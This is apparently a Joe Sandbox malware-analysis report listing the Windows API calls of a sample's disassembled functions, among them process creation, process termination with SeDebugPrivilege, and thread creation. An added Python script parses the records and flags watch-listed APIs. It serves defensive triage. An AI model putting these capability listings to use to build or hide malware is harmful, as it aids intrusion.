• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: 1d7b201ec920463ec7f92ea48d2868670e7d56f07df08f6615ee02ef07754848
• Instruction ID: 2d525b735d970353174b4a38a99023b629cb8bc76fb2989ebd8c0fe4a905ed6b
• Opcode Fuzzy Hash: 1d7b201ec920463ec7f92ea48d2868670e7d56f07df08f6615ee02ef07754848
• Instruction Fuzzy Hash: DFF14931A00209EFDF04DF94C898EAEB7B9BF49314F10819AF915EB251DB35AE46CB54
APIs
• _memset.LIBCMT ref: 004DF9C9
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004DFB5C
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004DFB80
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004DFBC0
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004DFBE2
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004DFD5E
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004DFD90
• CloseHandle.KERNEL32(?), ref: 004DFDBF
• CloseHandle.KERNEL32(?), ref: 004DFE36
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: f022d7fdc2938c2e3401dc2957e40d260888083be55dcf33b9e9064dcdc6322a
• Instruction ID: 47922b318ac1b892efea627e7dd20c553c8800449e845463786201b0ea36f804
• Opcode Fuzzy Hash: f022d7fdc2938c2e3401dc2957e40d260888083be55dcf33b9e9064dcdc6322a
• Instruction Fuzzy Hash: 6AE1B5311043409FC724EF25C491A6B7BE5AF85314F14846FF89A4B3A2DB78DC49CB5A
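The records in this section are the raw material for capability triage: each one lists the Win32 APIs a disassembled function calls, with the call site, the statically recovered arguments (`?` where the analyzer could not resolve a value) and, indented, the activity of its callees. The function above is the one to look at first, since it contains the sample's own CreateProcessW call, with the command line argument unresolved. The Python below is an added example and is not Joe Sandbox or AutoIt code: it parses records in this layout into per-function API lists and flags a few APIs worth a second look. The record grammar (a record starts at a bare `APIs` line; call lines read `Name.MODULE(args), ref: addr`; `Part of subcall function` lines belong to a callee) and the meaning of `?` are inferred from the lines on this page, not from a documented format, and the watch-list labels describe what each API does, not how this sample uses it. The sample text embedded in the block is constructed from two of the records above, shortened.

```python
"""Parse Joe Sandbox function-analysis records into per-function API lists
and flag triage-relevant capabilities.

Added example, not Joe Sandbox (or AutoIt) code.  Assumptions, inferred from
the records on this page rather than from any documented format:
  * a record begins at a bare 'APIs' line;
  * a call line reads '<Name>.<MODULE>(<args>), ref: <addr>' (parentheses
    and the comma are absent for CRT calls such as '_memset.LIBCMT ref: ...');
  * 'Part of subcall function <addr>: ...' lines are calls made by a callee,
    not by the function itself;
  * a '?' argument is one the analyzer could not resolve statically.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: two records copied (and shortened) from the report above.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 004DF9C9
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004DFB5C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004DFBC0
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004DFD5E
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004DFD90
• CloseHandle.KERNEL32(?), ref: 004DFDBF
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• Instruction Fuzzy Hash: 6AE1B5311043409FC724EF25C491A6B7BE5AF85314F14846FF89A4B3A2DB78DC49CB5A
APIs
  • Part of subcall function 004C48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?), ref: 004C48C7
  • Part of subcall function 004C4CD3: GetFileAttributesW.KERNEL32(?,004C3947), ref: 004C4CD4
• lstrcmpiW.KERNEL32(?,?), ref: 004C4FE2
• MoveFileW.KERNEL32(?,?), ref: 004C5017
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• Instruction Fuzzy Hash: 4B5174B64087855BC764EB51D891EDFB3ECAF84305F00492FF689C7152EE78B188876A
"""

CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^•\s*(API ID|Instruction Fuzzy Hash):\s*(\S.*)$")

# Illustrative watch-list: the label states what the API does, not how this
# sample uses it.  Extend to taste.
WATCHLIST = {
    "CreateProcessW": "spawns a child process",
    "MoveFileW": "moves or renames a file",
    "SetWindowLongW": "changes a window's attributes or window procedure",
    "QueryPathOfRegTypeLib": "looks up a registered COM type library",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str
    via_subcall: Optional[str] = None  # callee address when the call is indirect

    def unresolved_args(self) -> int:
        """Count of '?' arguments (values the analyzer could not resolve)."""
        return sum(1 for a in self.args if a == "?")


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    instruction_fuzzy_hash: str = ""

    def direct_apis(self) -> List[str]:
        return [c.name for c in self.calls if c.via_subcall is None]

    def subcall_apis(self) -> List[str]:
        return [c.name for c in self.calls if c.via_subcall is not None]


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text into records; lines that are not call or
    similarity fields (dump sources, snapshot file, hashes) are skipped."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = tuple(a for a in (m.group("args") or "").split(",") if a)
            cur.calls.append(ApiCall(m.group("name"), m.group("mod"), args,
                                     m.group("ref").upper(), m.group("sub")))
            continue
        m = FIELD_RE.match(line)
        if m:
            if m.group(1) == "API ID":
                cur.api_id = m.group(2)
            else:
                cur.instruction_fuzzy_hash = m.group(2)
    return records


def triage(records: List[FunctionRecord]) -> List[Tuple[int, str, str, str]]:
    """Return (record index, API, call site, description) for watch-listed
    APIs a function calls directly.  Subcall lines are deliberately excluded
    so every hit maps to one concrete address in the function itself."""
    hits = []
    for idx, rec in enumerate(records):
        for call in rec.calls:
            if call.via_subcall is None and call.name in WATCHLIST:
                hits.append((idx, call.name, call.ref, WATCHLIST[call.name]))
    return hits


if __name__ == "__main__":
    for idx, api, ref, what in triage(parse_records(SAMPLE)):
        print(f"record {idx}: {api} at {ref}: {what}")
```

Run against the full function-analysis text of a report, the output is a short list of addresses to open in the disassembler; the `unresolved_args()` count on the CreateProcessW call (six of ten arguments unresolved, including the command line) is the cue that the spawned command has to be recovered dynamically rather than read from the listing.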
APIs
  • Part of subcall function 004C48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004C38D3,?), ref: 004C48C7
  • Part of subcall function 004C48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004C38D3,?), ref: 004C48E0
  • Part of subcall function 004C4CD3: GetFileAttributesW.KERNEL32(?,004C3947), ref: 004C4CD4
• lstrcmpiW.KERNEL32(?,?), ref: 004C4FE2
• _wcscmp.LIBCMT ref: 004C4FFC
• MoveFileW.KERNEL32(?,?), ref: 004C5017
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: cdb57ac36939397f74c181529f6a7345a252f3edd6542a24d52de90b62042319
• Instruction ID: f7b79d19ada2c9fa1161190ca5676b7a0194a69eaa34a8d0677a9c18fdefd131
• Opcode Fuzzy Hash: cdb57ac36939397f74c181529f6a7345a252f3edd6542a24d52de90b62042319
• Instruction Fuzzy Hash: 4B5174B64087855BC764EB51D891EDFB3ECAF84305F00492FF689C7152EE78B188876A
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004E896E
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: a5be269cb777b5ca74b594b4b1325b14df7c6e4e3b0bddadc36e731cc62d5a0d
• Instruction ID: bdaa32fe1cf734ff2d94fdcd21372391405ee189156f3ac3f87297dc2671ef68
• Opcode Fuzzy Hash: a5be269cb777b5ca74b594b4b1325b14df7c6e4e3b0bddadc36e731cc62d5a0d
• Instruction Fuzzy Hash: 3E51A430900284BFDF209F26CC85B6A3B65BF05316F50456FF919E62E1DF79A9809B49
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0049C547
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0049C569
                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0049C581
                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0049C59F
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0049C5C0
                                                                                                                                                                            • DestroyIcon.USER32(00000000), ref: 0049C5CF
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0049C5EC
• DestroyIcon.USER32(?), ref: 0049C5FB
  • Part of subcall function 004EA71E: DeleteObject.GDI32(00000000), ref: 004EA757
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
• String ID:
• API String ID: 2819616528-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,004B8A84,00000B00,?,?), ref: 004B8E0C
• HeapAlloc.KERNEL32(00000000,?,004B8A84,00000B00,?,?), ref: 004B8E13
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004B8A84,00000B00,?,?), ref: 004B8E28
• GetCurrentProcess.KERNEL32(?,00000000,?,004B8A84,00000B00,?,?), ref: 004B8E30
• DuplicateHandle.KERNEL32(00000000,?,004B8A84,00000B00,?,?), ref: 004B8E33
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,004B8A84,00000B00,?,?), ref: 004B8E43
• GetCurrentProcess.KERNEL32(004B8A84,00000000,?,004B8A84,00000B00,?,?), ref: 004B8E4B
• DuplicateHandle.KERNEL32(00000000,?,004B8A84,00000B00,?,?), ref: 004B8E4E
• CreateThread.KERNEL32(00000000,00000000,004B8E74,00000000,00000000,00000000), ref: 004B8E68
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
  • Part of subcall function 004B7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?,?,004B799D), ref: 004B766F
  • Part of subcall function 004B7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?), ref: 004B768A
  • Part of subcall function 004B7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?,?), ref: 004B7698
  • Part of subcall function 004B7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004B758C,80070057,?), ref: 004B76A8
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 004D9B1B
• _memset.LIBCMT ref: 004D9B28
• _memset.LIBCMT ref: 004D9C6B
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 004D9C97
• CoTaskMemFree.OLE32(?), ref: 004D9CA2
Strings
• NULL Pointer assignment, xrefs: 004D9CF0
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 1300414916-2785691316
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004E7093
• SendMessageW.USER32(?,00001036,00000000,?), ref: 004E70A7
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004E70C1
• _wcscat.LIBCMT ref: 004E711C
• SendMessageW.USER32(?,00001057,00000000,?), ref: 004E7133
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 004E7161
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
APIs
  • Part of subcall function 004C3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 004C3EB6
  • Part of subcall function 004C3E91: Process32FirstW.KERNEL32(00000000,?), ref: 004C3EC4
  • Part of subcall function 004C3E91: CloseHandle.KERNEL32(00000000), ref: 004C3F8E
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 004DECB8
• GetLastError.KERNEL32 ref: 004DECCB
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 004DECFA
• TerminateProcess.KERNEL32(00000000,00000000), ref: 004DED77
• GetLastError.KERNEL32(00000000), ref: 004DED82
• CloseHandle.KERNEL32(00000000), ref: 004DEDB7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 004C32C5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: ccf9158012c4a34e1c4e2d1ca1109767a38b3e929891f8131f765f8ef6d3ad82
• Instruction ID: ca7ffd106d90ef4a1a79f38dd1af3068d608c4612de1de4f631beab7ad0a3444
• Opcode Fuzzy Hash: ccf9158012c4a34e1c4e2d1ca1109767a38b3e929891f8131f765f8ef6d3ad82
• Instruction Fuzzy Hash: 4F115B39208346BABB025E55EC42EAFB79CEF19B76F10406FF40056282E7BD5B4146AD
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004C454E
• LoadStringW.USER32(00000000), ref: 004C4555
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004C456B
• LoadStringW.USER32(00000000), ref: 004C4572
• _wprintf.LIBCMT ref: 004C4598
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004C45B6
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 004C4593
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: aa62b6460b5c8d89bb102818b05d80adf684e099f193f9de02a9983f3bf54119
• Instruction ID: 8f364bbea4e4d7680841e37f50802f3bc6ba85e43ba9789e1c34997c6e080797
• Opcode Fuzzy Hash: aa62b6460b5c8d89bb102818b05d80adf684e099f193f9de02a9983f3bf54119
• Instruction Fuzzy Hash: E501A7F6400248BFE750A7A0DD89EF7776CD708301F0005B6BB45D6052E6345E894B78
APIs
  • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
• GetSystemMetrics.USER32(0000000F), ref: 004ED78A
• GetSystemMetrics.USER32(0000000F), ref: 004ED7AA
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 004ED9E5
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004EDA03
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004EDA24
• ShowWindow.USER32(00000003,00000000), ref: 004EDA43
• InvalidateRect.USER32(?,00000000,00000001), ref: 004EDA68
• DefDlgProcW.USER32(?,00000005,?,?), ref: 004EDA8B
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
• Opcode ID: cf1f467cad3c6ed120295747bfb9f02dcb21296b8ba156abbf77fb47556fc0c2
• Instruction ID: 4a716734295105bbc298457862ff352fbdf91e55468d796900095030defb491c
• Opcode Fuzzy Hash: cf1f467cad3c6ed120295747bfb9f02dcb21296b8ba156abbf77fb47556fc0c2
• Instruction Fuzzy Hash: 7DB18C71900295EFDF14CF6AC9C57BE7BB1BF04702F08817AEC489A296D738AA54CB54
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0049C417,00000004,00000000,00000000,00000000), ref: 00462ACF
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0049C417,00000004,00000000,00000000,00000000,000000FF), ref: 00462B17
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0049C417,00000004,00000000,00000000,00000000), ref: 0049C46A
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0049C417,00000004,00000000,00000000,00000000), ref: 0049C4D6
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: be0db26923cb47d064d658d3c7b239daf6ee728d345ccba43764013a13b65b32
• Instruction ID: 686193b0cf11d840aae20db6177778e936546bbd316b1ac01ed15b46aa359574
• Opcode Fuzzy Hash: be0db26923cb47d064d658d3c7b239daf6ee728d345ccba43764013a13b65b32
• Instruction Fuzzy Hash: 6A411C30604BC0BACF758B689ED867B3B91AB55300F14852FE08746661E6FDA846E71F
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 004C737F
  • Part of subcall function 00480FF6: std::exception::exception.LIBCMT ref: 0048102C
  • Part of subcall function 00480FF6: __CxxThrowException@8.LIBCMT ref: 00481041
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004C73B6
• EnterCriticalSection.KERNEL32(?), ref: 004C73D2
• _memmove.LIBCMT ref: 004C7420
• _memmove.LIBCMT ref: 004C743D
• LeaveCriticalSection.KERNEL32(?), ref: 004C744C
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004C7461
• InterlockedExchange.KERNEL32(?,000001F6), ref: 004C7480
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: e7e732273fb121324991250b3d20bd92e73f2d916be7ae4f315a8c80de16b8ac
• Instruction ID: c16a94fc0c03bd838ef0b45b8324448c0e8a1cd4589db68749bcfbc838439127
• Opcode Fuzzy Hash: e7e732273fb121324991250b3d20bd92e73f2d916be7ae4f315a8c80de16b8ac
• Instruction Fuzzy Hash: 5F31AE35900205EBCF10EF55DC85AAFBB78EF45310B1480BAFA04AB256DB349A14DBA8
APIs
• DeleteObject.GDI32(00000000), ref: 004E645A
• GetDC.USER32(00000000), ref: 004E6462
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004E646D
• ReleaseDC.USER32(00000000,00000000), ref: 004E6479
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004E64B5
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004E64C6
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004E9299,?,?,000000FF,00000000,?,000000FF,?), ref: 004E6500
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004E6520
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 6e3c7cdfdd8a09394fec86c4fe3296890f0f44a821008f235623303c627711b2
• Instruction ID: be8933e6776a3aa112558ba6ce40661434c8d24f6c4dbb5b36da327cef6be88e
• Opcode Fuzzy Hash: 6e3c7cdfdd8a09394fec86c4fe3296890f0f44a821008f235623303c627711b2
• Instruction Fuzzy Hash: 1F31B172200250BFEB108F61DC89FEB3FA9EF09761F044066FE089E292C6759C41CB68
APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2931989736-0
                                                                                                                                                                            • Opcode ID: c9f44201ea0bace305671cfd34d46080734ef5db8ae5a63e42d9ec0c9a245657
                                                                                                                                                                            • Instruction ID: e75bef756129cc474f783f43beea25800e4aa594327ef8a1ca9fc5729f9f8d47
                                                                                                                                                                            • Opcode Fuzzy Hash: c9f44201ea0bace305671cfd34d46080734ef5db8ae5a63e42d9ec0c9a245657
                                                                                                                                                                            • Instruction Fuzzy Hash: 3B21B371601209B79610B5259DC2FFF239CAE20398B140027FF05A6392F79DDD1286BE
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                              • Part of subcall function 0047FEC6: _wcscpy.LIBCMT ref: 0047FEE9
                                                                                                                                                                            • _wcstok.LIBCMT ref: 004CEEFF
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004CEF8E
                                                                                                                                                                            • _memset.LIBCMT ref: 004CEFC1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
